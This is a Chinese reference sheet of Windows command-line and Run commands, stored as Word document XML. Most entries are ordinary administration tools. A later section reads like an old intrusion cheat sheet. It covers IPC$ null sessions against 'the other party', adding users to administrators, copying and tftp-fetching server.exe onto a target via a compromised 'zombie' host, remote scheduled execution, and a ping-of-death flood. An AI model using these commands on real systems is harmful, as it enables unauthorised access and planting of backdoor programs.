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D5CE" w14:textId="209CE263" w:rsidR="0069358E" w:rsidRDefault="00137FA7" w:rsidP="00137FA7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pP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命令操作大全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6834D031" w14:textId="3DA5C289" w:rsidR="00137FA7" w:rsidRDefault="00137FA7"/>
    <w:p w14:paraId="47450828" w14:textId="4AB822CE" w:rsidR="00137FA7" w:rsidRPr="00137FA7" w:rsidRDefault="00137FA7" w:rsidP="00137FA7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="150"/>
        <w:ind w:firstLineChars="200" w:firstLine="56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command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的缩写</w:t>
      </w:r>
      <w:r w:rsidRPr="00137FA7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即命令行。虽然随着计算机产业的发展，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Windows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操作系统的应用越来越广泛，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DOS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面临着被淘汰的命运，但是因为它运行安全、稳定，有的用户还在使用，所以一般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Windows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的各种版本都与其兼容，用户可以在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Windows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系统下运行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，中文版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Windows XP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中的命令提示符进一步提高了与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DOS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下操作命令的兼容性，用户可以在命令提示符直接输入中文调用文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E56BECC" w14:textId="4610E3E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在</w:t>
      </w:r>
      <w:r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Windows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系统下输入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来打开，利用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命令查询系统的信息或者是判断网络的好坏。下图为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启动后的界面。</w:t>
      </w:r>
      <w:r w:rsidRPr="00137F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7FA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739467" wp14:editId="293DDCE6">
            <wp:extent cx="5962650" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="https://images.cnblogs.com/cnblogs_com/greatverve/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greatverve/1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D89C" w14:textId="77777777" w:rsid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14:paraId="449249EB" w14:textId="77777777" w:rsid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14:paraId="20E270E7" w14:textId="6E90D04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运行操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A120AC3" w14:textId="6DCB508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命令：开始－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运行－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键入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</w:p>
    <w:p w14:paraId="1CB5A766" w14:textId="77777777" w:rsid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命令锦集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BBEA83" w14:textId="7CA9E4A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1. gpedit.msc-----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组策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382053EB" w14:textId="5B9EDE1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2. sndrec32-------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录音机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B403E47" w14:textId="5F344E0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3. Nslookup-------IP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地址侦测器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，是一个监测网络中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DNS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服务器是否能正确实现域名解析的命令行工具。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</w:p>
    <w:p w14:paraId="7AA216CF" w14:textId="74A3673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4. explorer-------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打开资源管理器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37520E6B" w14:textId="3BBAC98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5. logoff---------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注销命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FFE53A" w14:textId="07D1E3F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6. shutdown-------60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秒倒计时关机命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3109D16A" w14:textId="1A2221E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7. lusrmgr.msc----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本机用户和组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3A633" w14:textId="2A7AE80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8. services.msc---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本地服务设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FBD26F" w14:textId="4824BB0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9. oobe/msoobe /a----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是否激活</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C4D958" w14:textId="4427A48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10. notepad--------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打开记事本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD2E9D2" w14:textId="046CC01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11. cleanmgr-------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垃圾整理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756109DB" w14:textId="774F6D1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12. net start messenger----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开始信使服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C41E55" w14:textId="2C271A4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13. compmgmt.msc---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计算机管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCC5B73" w14:textId="442836A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14. net stop messenger-----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停止信使服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DD29EF" w14:textId="1733B4A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15. conf-----------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netmeeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9EA9E2" w14:textId="2EC5939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16. dvdplay--------DVD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播放器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE8512A" w14:textId="79EEB37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17. charmap--------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启动字符映射表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7EA115" w14:textId="0481BC2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18. diskmgmt.msc---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磁盘管理实用程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF680E4" w14:textId="4AEF9B4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19. calc-----------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启动计算器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BB71A3" w14:textId="610D5C2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20. dfrg.msc-------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磁盘碎片整理程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660346A4" w14:textId="5346BD6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21. chkdsk.exe-----Chkdsk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磁盘检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9E5E9" w14:textId="6569990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22. devmgmt.msc---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设备管理器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B5D770" w14:textId="3CC8492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23. regsvr32 /u *.dll----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文件运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F16BB95" w14:textId="515F6FA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24. drwtsn32------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系统医生</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7626F913" w14:textId="559E869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25. rononce -p----15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秒关机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502E45B6" w14:textId="710BB13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26. dxdiag---------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DirectX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信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35420B" w14:textId="072BB1D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27. regedt32-------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注册表编辑器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08335B31" w14:textId="06E9DAC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28. Msconfig.exe---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系统配置实用程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353E2D4F" w14:textId="5A46064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29. rsop.msc-------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组策略结果集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D069E" w14:textId="6FB1ECA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30. mem.exe--------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显示内存使用情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D3A9D9" w14:textId="212EEBF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31. regedit.exe----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注册表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2727CA7E" w14:textId="779D7AD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32. winchat--------XP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自带局域网聊天</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C900363" w14:textId="75226B5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33. progman--------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程序管理器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDECEF8" w14:textId="1A1E429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34. winmsd---------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系统信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB6F06A" w14:textId="3B58C30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35. perfmon.msc----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计算机性能监测程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31D0C6" w14:textId="3AF7B09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36. winver---------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Windows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版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38231399" w14:textId="2DF2EC8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37. sfc /scannow-----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扫描错误并复原</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B39BFD" w14:textId="43E1D9A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38. taskmgr-----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任务管理器（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2000/xp/2003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697416B8" w14:textId="003383E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40. wmimgmt.msc----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windows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管理体系结构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(WMI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25987A92" w14:textId="70EB004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41. wupdmgr--------windows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更新程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A2F1D4" w14:textId="398A90E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42. wscript--------windows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脚本宿主设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37243419" w14:textId="62860EE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43. write----------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写字板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EF7402" w14:textId="57E4848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wiaacmgr-------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扫描仪和照相机向导</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37422ACC" w14:textId="1110AE8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winchat--------XP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自带局域网聊天</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0070A530" w14:textId="72A3941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mplayer2-------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简易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widnows media player</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7DDB14" w14:textId="4A7BB32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47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mspaint--------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画图板</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034A9AC3" w14:textId="3984334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48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mstsc----------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远程桌面连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601FD9AB" w14:textId="31332E3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49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magnify--------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放大镜实用程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE631E" w14:textId="4AFB15C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mmc------------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打开控制台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D5942" w14:textId="446C310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mobsync--------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同步命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C35E6E8" w14:textId="1480023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iexpress-------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木马捆绑工具，系统自带</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE83963" w14:textId="02F466D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fsmgmt.msc-----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共享文件夹管理器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE3C0B" w14:textId="19509D6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utilman--------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辅助工具管理器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23824ADD" w14:textId="70166CB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55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dcomcnfg-------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打开系统组件服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587EC418" w14:textId="741F40F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56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ddeshare-------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DDE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共享设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1235B552" w14:textId="2B34D82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57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osk------------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打开屏幕键盘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3179D425" w14:textId="7E684BF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58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odbcad32-------ODBC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数据源管理器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CC629D" w14:textId="08AEFA9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59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oobe/msoobe /a----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是否激活</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EFEC57" w14:textId="2657E90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ntbackup-------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系统备份和还原</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4A8E23" w14:textId="4F8A980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narrator-------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屏幕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讲述人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”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3BA7F5" w14:textId="605EA76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ntmsmgr.msc----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移动存储管理器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA75AA4" w14:textId="198D502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ntmsoprq.msc---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移动存储管理员操作请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D09FD" w14:textId="4657D09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64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netstat -an----(TC)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命令检查接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E850288" w14:textId="525053D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syncapp--------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创建一个公文包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBEEA27" w14:textId="27EFD8D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sysedit--------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系统配置编辑器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A29D6B4" w14:textId="37ACC02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67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sigverif-------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文件签名验证程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021E66AD" w14:textId="0A53D2C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ciadv.msc------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索引服务程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63559F90" w14:textId="00CC01D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69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shrpubw--------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创建共享文件夹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D7314D" w14:textId="30E0B94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secpol.msc-----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本地安全策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B4D95" w14:textId="1BFE769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</w:t>
      </w:r>
      <w:r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syskey---------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系统加密，一旦加密就不能解开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432C3B93" w14:textId="577172A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services.msc---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本地服务设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F64634" w14:textId="5DE23C4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Sndvol32-------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音量控制程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEFFD87" w14:textId="15C926E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sfc.exe--------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系统文件检查器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDDE634" w14:textId="43C8D20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sfc /scannow---windows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文件保护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D541A3" w14:textId="36DDB3D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ciadv.msc------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索引服务程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F480C2" w14:textId="2E5943A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7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7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taskmgr--------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任务管理器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFC5D42" w14:textId="34B66B5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eventvwr-------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事件查看器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22926B18" w14:textId="21A2E015" w:rsidR="00137FA7" w:rsidRPr="00137FA7" w:rsidRDefault="008C1716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79</w:t>
      </w:r>
      <w:r w:rsidR="00137FA7"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eudcedit-------</w:t>
      </w:r>
      <w:r w:rsidR="00137FA7"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造字程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66234172" w14:textId="161BE68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compmgmt.msc---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计算机管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7192A86C" w14:textId="53CE019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packager-------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对象包装程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22543AA9" w14:textId="3FC1917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perfmon.msc----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计算机性能监测程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145B2FF4" w14:textId="33C7D68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charmap--------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启动字符映射表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094B4CDB" w14:textId="2846C6A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. cliconfg-------SQL SERVER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客户端网络实用程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D01D4A" w14:textId="0978A8D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Clipbrd--------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剪贴板查看器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53006E68" w14:textId="7B942C6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conf-----------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netmeeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52987368" w14:textId="0E5E019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7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certmgr.msc----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证书管理实用程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D903EA3" w14:textId="04DB362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regsvr32 /u *.dll----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文件运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BFD598" w14:textId="2938AA77" w:rsidR="00137FA7" w:rsidRPr="00137FA7" w:rsidRDefault="008C1716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/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>89</w:t>
      </w:r>
      <w:r w:rsidR="00137FA7"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regsvr32 /u zipfldr.dll------</w:t>
      </w:r>
      <w:r w:rsidR="00137FA7"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取消</w:t>
      </w:r>
      <w:r w:rsidR="00137FA7"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ZIP</w:t>
      </w:r>
      <w:r w:rsidR="00137FA7"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支持</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17721504" w14:textId="5AB2ED64" w:rsid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9</w:t>
      </w:r>
      <w:r w:rsidR="008C1716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 cmd.exe--------CMD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命令提示符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D49E91A" w14:textId="77777777" w:rsidR="008C1716" w:rsidRPr="00137FA7" w:rsidRDefault="008C1716" w:rsidP="00137FA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</w:p>
    <w:p w14:paraId="0E9D0A68" w14:textId="7777777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操作详解　　</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A4E3FD" w14:textId="378040C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 ipipc$ " " /user:" "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空链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB4132" w14:textId="44C41F0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 use ipipc$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 /user:"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"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非空链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6190DE4C" w14:textId="5850C86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 use h: ipc$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 /user:"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"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直接登陆后映射对方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：到本地为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H:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAD0039" w14:textId="4A595A2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 h: ipc$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登陆后映射对方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：到本地为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H:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE52CA" w14:textId="42C6F22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 ipipc$ /del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链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EADF2F" w14:textId="24C2EAD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 h: /del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删除映射对方到本地的为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的映射</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A80D2B5" w14:textId="2C87D3F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用户名　密码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/add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建立用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B205248" w14:textId="6366EB4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user guest /active:yes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激活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guest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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201569E" w14:textId="6567DA8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查看有哪些用户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6864C9A8" w14:textId="7AB9ADA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帐户名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查看帐户的属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D991F33" w14:textId="4269F7E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localgroup administrators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/add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添加到管理员中使其具有管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764EDA51" w14:textId="3D44DFD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start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查看开启了哪些服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1A39C1" w14:textId="7AEFB19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net start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服务名　开启服务；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:net start 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net start schedule)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B268358" w14:textId="3D690C8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stop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停止某服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F89A5D4" w14:textId="1AB1E68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time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查看对方时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB8E5C" w14:textId="6E212E8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time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 /set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设置本地计算机时间与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主机的时间同步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加上参数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/yes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可取消确认信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368118D1" w14:textId="1ECAE36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view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查看本地局域网内开启了哪些共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A1E903" w14:textId="71F57EC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view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查看对方局域网内开启了哪些共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B74DED3" w14:textId="1BF9D80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config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显示系统网络设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D950A1D" w14:textId="25B4CF0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logoff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断开连接的共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B1BC9E" w14:textId="1B82768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pause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暂停某服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329E018B" w14:textId="65D1494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 send ip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文本信息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"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向对方发信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AE0CFB" w14:textId="7BF4509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ver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局域网内正在使用的网络连接类型和信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A34F112" w14:textId="4211B5E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share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查看本地开启的共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C110AFD" w14:textId="787CA7B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share ipc$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开启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ipc$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共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DF88BE" w14:textId="0A31DCC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share ipc$ /del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ipc$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共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8DAC2C" w14:textId="216FCC5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share c$ /del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：共享</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C131B4F" w14:textId="46D48A0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user guest 12345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guest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用户登陆后用将密码改为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12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240B5AFA" w14:textId="668F77C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password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更改系统登陆密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ADE1EA" w14:textId="62A075E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netstat -a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查看开启了哪些端口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常用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netstat -an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C0B795" w14:textId="48D0DF7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netstat -n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查看端口的网络连接情况，常用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netstat -an</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534FA658" w14:textId="408FBF3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netstat -v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查看正在进行的工作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AD684B" w14:textId="74A7091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netstat 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协议名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netstat -p tcq/ip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查看某协议使用情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486D56B" w14:textId="0EC1FA2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netstat -s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查看正在使用的所有协议使用情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B65159" w14:textId="64CA550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nbtstat -A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136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139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其中一个端口开了的话，就可查看对方最近登陆的用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B9741" w14:textId="6C433F4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tracert -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ip(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或计算机名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跟踪路由（数据包），参数：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“-w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用于设置超时间隔。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C65CDF" w14:textId="20C5A2D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ping ip(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或域名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向对方主机发送默认大小为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字节的数据，参数：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“-l[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空格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数据包大小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“-n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发送数据次数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“-t”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指一直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ping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1CE5C310" w14:textId="46AFCB2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ping -t -l 65550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死亡之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ping(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发送大于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64K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的文件并一直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ping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就成了死亡之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ping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3578ED71" w14:textId="5DB179B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ipconfig (winipcfg)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windows NT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XP(windows 95 98)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查看本地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ipconfig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“/all”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显示全部配置信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B39DD77" w14:textId="2B6D38D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tlist -t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以树行列表显示进程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为系统的附加工具，默认是没有安装的，在安装目录的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Support/tools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文件夹内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75F22121" w14:textId="4802912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kill -F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进程名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参数后强制结束某进程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为系统的附加工具，默认是没有安装的，在安装目录的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Support/tools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文件夹内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64EDD56A" w14:textId="3DDCEFB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del -F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参数后就可删除只读文件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,/AR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/AH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/AA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分别表示删除只读、隐藏、系统、存档文件，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/A-R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/A-H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/A-S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/A-A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表示删除除只读、隐藏、系统、存档以外的文件。例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“DEL/AR *.*”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表示删除当前目录下所有只读文件，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“DEL/A-S *.*”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表示删除当前目录下除系统文件以外的所有文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321290A" w14:textId="4DAADED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del /S /Q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rmdir /s /Q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删除目录及目录下的所有子目录和文件。同时使用参数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/Q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可取消删除操作时的系统确认就直接删除。（二个命令作用相同）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A301CD3" w14:textId="07F2276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move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盘符路径要移动的文件名　存放移动文件的路径移动后文件名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移动文件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/y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将取消确认移动目录存在相同文件的提示就直接覆盖</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CED3B3" w14:textId="3962D54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fc one.txt two.txt &gt; 3st.txt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对比二个文件并把不同之处输出到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3st.txt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"&gt;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"&gt; &gt;"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是重定向命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C360B" w14:textId="69C94EC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at id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开启已注册的某个计划任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD230CB" w14:textId="3B40D3F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at /delete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停止所有计划任务，用参数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/yes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则不需要确认就直接停止</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA6ABB1" w14:textId="642F549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at id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/delete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停止某个已注册的计划任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21159E3D" w14:textId="1A77C2C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查看所有的计划任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5564443B" w14:textId="3C50BB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at ip time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程序名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或一个命令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) /r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在某时间运行对方某程序并重新启动计算机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029A5C83" w14:textId="3990833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finger username @host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查看最近有哪些用户登陆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DBAF3B" w14:textId="07BFC56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telnet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远和登陆服务器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默认端口为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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE59A1" w14:textId="6D2D6BF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open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（属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登陆后的命令）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41215552" w14:textId="5F66E24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telnet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在本机上直接键入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telnet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将进入本机的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</w:p>
    <w:p w14:paraId="36D310D8" w14:textId="7714524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copy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路径文件名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路径文件名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 /y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复制文件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到指定的目录为文件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/y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就同时取消确认你要改写一份现存目录文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39F114" w14:textId="4C897CE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copy c:srv.exe ipadmin$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复制本地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c:srv.exe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到对方的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admin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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE27875" w14:textId="4A789B0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copy 1st.jpg/b+2st.txt/a 3st.jpg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2st.txt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的内容藏身到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1st.jpg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中生成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3st.jpg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新的文件，注：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2st.txt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文件头要空三排，参数：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/b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指二进制文件，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/a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格式文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A342BCC" w14:textId="319BECF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copy ipadmin$svv.exe c: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:copyipadmin$*.*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复制对方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admini$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共享下的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srv.exe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文件（所有文件）至本地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</w:p>
    <w:p w14:paraId="35AAF3AD" w14:textId="4A86AAE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xcopy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要复制的文件或目录树　目标地址目录名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复制文件和目录树，用参数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/Y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将不提示覆盖相同文件用参数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才可连目录下的子目录一起复制到目标地址下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A530F2F" w14:textId="554B31B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tftp -i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自己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用肉机作跳板时这用肉机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IP) get server.exe c:server.exe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登陆后，将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“IP”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server.exe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下载到目标主机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c:server.exe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指以二进制模式传送，如传送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文件时用，如不加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则以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模式（传送文本文件模式）进行传送</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A6805" w14:textId="55618E9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tftp -i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put c:server.exe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登陆后，上传本地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c:server.exe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至主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F58205" w14:textId="4EF3FAC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ftp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用于上传文件至服务器或进行文件操作，默认端口为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bin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指用二进制方式传送（可执行文件进）；默认为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格式传送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文本文件时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668A03D5" w14:textId="56E72AC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route print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路由，将主要显示网络地址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Network addres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，子网掩码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Netmask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，网关地址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Gateway addres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，接口地址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Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C1F2B2" w14:textId="2FB5C03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arp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查看和处理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ARP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缓存，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ARP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是名字解析的意思，负责把一个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解析成一个物理性的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MAC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arp -a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将显示出全部信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46887B38" w14:textId="5A25B95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start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程序名或命令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/max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/min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新开一个新窗口并最大化（最小化）运行某程序或命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEBE40A" w14:textId="7D51ED0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mem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cpu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使用情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00984587" w14:textId="297D18B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attrib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查看某文件（目录）的属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0031D" w14:textId="706F3BE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attrib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-A -R -S -H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+A +R +S +H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去掉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添加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某文件的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存档，只读，系统，隐藏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属性；用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+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则是添加为某属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37745CC8" w14:textId="04B3FA4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dir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查看文件，参数：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/Q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显示文件及目录属系统哪个用户，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/T:C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显示文件创建时间，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/T:A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显示文件上次被访问时间，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/T:W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上次被修改时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06184398" w14:textId="2CA60FA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date /t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time /t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使用此参数即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“DATE/T”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“TIME/T”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将只显示当前日期和时间，而不必输入新日期和时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE5D703" w14:textId="13E791A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set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指定环境变量名称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要指派给变量的字符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设置环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B768227" w14:textId="661E9CE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set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显示当前所有的环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6BF9F2" w14:textId="19E8F3C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set p(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或其它字符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显示出当前以字符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或其它字符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开头的所有环境变量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560826C" w14:textId="7B71A66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pause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暂停批处理程序，并显示出：请按任意键继续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....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327823FB" w14:textId="3D0664B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在批处理程序中执行条件处理（更多说明见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命令及变量）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609173F" w14:textId="2210991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goto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标签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导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：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start”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标签）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CD952A" w14:textId="6E5C922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call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路径批处理文件名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从批处理程序中调用另一个批处理程序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（更多说明见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call /?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</w:p>
    <w:p w14:paraId="1AE05ED3" w14:textId="03D31A0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for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对一组文件中的每一个文件执行某个特定命令（更多说明见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命令及变量）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA29414" w14:textId="31AA612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echo on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off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打开或关闭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echo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，仅用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echo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不加参数则显示当前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echo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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74178B6B" w14:textId="4A14DE5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echo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信息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在屏幕上显示出信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C8500" w14:textId="674A42E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echo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信息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&gt;&gt; pass.txt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信息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保存到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pass.txt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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00973808" w14:textId="3FFD85A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findstr "Hello" aa.txt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aa.txt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文件中寻找字符串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hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444D3504" w14:textId="4A05714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find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查找某文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F7B770" w14:textId="43B10B4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title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标题名字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更改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窗口标题名字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4538F4" w14:textId="0EF7B0C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color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颜色值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控制台前景和背景颜色；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0=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黑、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蓝、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绿、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浅绿、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红、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紫、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黄、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白、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灰、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9=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淡蓝、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淡绿、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B=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淡浅绿、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淡红、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淡紫、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淡黄、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亮白</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA6A661" w14:textId="23A1B49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prompt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名称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更改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的显示的命令提示符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统一改为：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EntSky )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5049CADA" w14:textId="7FF396E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ver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窗口下显示版本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F7F186" w14:textId="6B5F4FE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winver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弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）</w:t>
      </w:r>
    </w:p>
